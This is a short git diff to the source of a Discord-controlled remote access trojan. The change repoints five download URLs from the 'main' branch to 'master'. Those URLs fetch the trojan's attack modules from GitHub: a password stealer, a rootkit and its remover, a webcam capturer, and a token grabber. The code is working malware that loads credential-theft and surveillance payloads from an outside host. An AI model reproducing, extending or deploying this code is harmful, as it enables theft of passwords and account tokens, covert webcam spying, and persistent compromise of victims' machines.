diff --git a/Discord rat/Program.cs b/Discord rat/Program.cs index b9e9a18..a7234df 100644 --- a/Discord rat/Program.cs +++ b/Discord rat/Program.cs @@ -153,11 +153,11 @@ internal struct LASTINPUTINFO public static Dictionary dll_holder = new Dictionary(); public static Dictionary activator_holder = new Dictionary(); public static Dictionary dll_url_holder = new Dictionary { - {"password", "https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/main/Discord%20rat/Resources/PasswordStealer.dll"}, - { "rootkit","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/main/Discord%20rat/Resources/rootkit.dll"}, - { "unrootkit","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/main/Discord%20rat/Resources/unrootkit.dll"}, - { "webcam","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/main/Discord%20rat/Resources/Webcam.dll"}, - { "token","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/main/Discord%20rat/Resources/Token%20grabber.dll"} + {"password", "https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dll"}, + { "rootkit","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll"}, + { "unrootkit","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.dll"}, + { "webcam","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll"}, + { "token","https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll"} }; public static Dictionary ObjectToDictionary(object obb) { @@ -1267,4 +1267,4 @@ public static async Task CommandHandler(string message_content, string[] attachm } } } -} \ No newline at end of file +}